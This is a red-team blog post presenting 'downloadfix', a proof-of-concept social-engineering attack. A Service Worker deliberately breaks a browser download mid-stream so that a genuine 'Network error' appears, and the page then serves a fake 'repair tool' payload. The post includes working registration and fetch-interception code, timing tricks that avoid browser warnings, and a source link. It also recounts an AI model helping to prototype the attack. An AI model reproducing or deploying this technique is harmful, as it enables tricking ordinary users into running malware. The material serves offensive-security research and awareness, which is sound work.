June 23, 2025
Bring Your Own Fix — Mr.D0x inspired variation of yet another "fix" attack
A downloadfix PoC using Service Workers to simulate failed downloads and trick users into running a "repair tool" — inspired by Mr.D0x's browser-based fix attacks.
Originally published on redteamer.tips
It all started with a tweet
I was scrolling through my timeline when I saw a tweet from Mr.D0x about a new variation of a “fix” attack — one that abuses browsers to socially engineer users into executing malicious commands. It was clever, creative, and immediately got the gears turning in my head.
So naturally, I jokingly replied:
“inb4 downloadfix”
And then I sat there staring at my own reply, thinking… wait. That could actually work.
The idea
What if you could simulate a failed download in the browser, and then convince the user to run a “repair tool” to fix it? The download looks legitimate, it appears to fail mid-stream with a genuine browser error, and then — oh how convenient — here’s a helpful tool to fix the problem.
Classic social engineering, but with a technical twist that makes the failed download look completely authentic.
From joke to PoC
I first pitched the idea to ChatGPT, which was… unhelpful. It kept suggesting overly complex approaches or telling me it wasn’t possible to control browser download behavior from JavaScript. Thanks for nothing.
Then I switched to Gemini 2.5 Pro, and it immediately gave me a solid approach: Service Workers.
Service Workers sit between your web page and the network. They can intercept fetch requests, manipulate responses, and — crucially — they can deliberately break a download mid-stream in a way that looks completely natural to the browser.
How it works
The attack flow is beautifully simple:
Step 1: Register the Service Worker
index.html registers a Service Worker (sw.js) and triggers a file download. Nothing suspicious — just a page that starts downloading a file.
<script>
if ('serviceWorker' in navigator) {
navigator.serviceWorker.register('/sw.js')
.then(() => {
// Trigger the download after SW is active
window.location.href = '/download/important-document.pdf';
});
}
</script>Step 2: Intercept and sabotage
sw.js intercepts the fetch request for the download. It starts streaming a real file — actual bytes, proper headers, everything looks legitimate. The browser shows a download in progress.
Then, mid-stream, it deliberately throws an error.
self.addEventListener('fetch', (event) => {
if (event.request.url.includes('/download/')) {
event.respondWith(
new Response(
new ReadableStream({
start(controller) {
// Send some real data first...
controller.enqueue(new Uint8Array([/* real file bytes */]));
// Then kill the stream
setTimeout(() => {
controller.error('Network error');
}, 1500);
}
}),
{ headers: { 'Content-Type': 'application/pdf' } }
)
);
}
});Step 3: The browser does our dirty work
The browser shows the download as “Failed - Network Error”. This is a genuine browser error message — not something we’re spoofing in the page. It looks completely authentic because, from the browser’s perspective, the download did fail.
Step 4: Serve the “repair tool”
After a deliberate delay (to avoid the browser’s “multiple downloads” warning), the page serves up the “repair tool” — a helpful little executable that will “fix” the corrupted download.
Of course, the “repair tool” is whatever payload you want it to be.
The delay is important. If you trigger the second download too quickly after the first, the browser will show a “This site is trying to download multiple files” prompt, which breaks the illusion.
TLDR
With AI and a bit of inspiration, it becomes trivial to rapidly prototype new TTPs. The idea went from a joke reply on a tweet to a working proof of concept in under an hour.
The uncomfortable truth: if you can think of it, you can build it within minutes or hours. The barrier between concept and weaponizable PoC has never been lower.
Source code: https://github.com/jfmaes/downloadfix
Stay creative, stay curious — and maybe think twice before clicking that “repair tool.”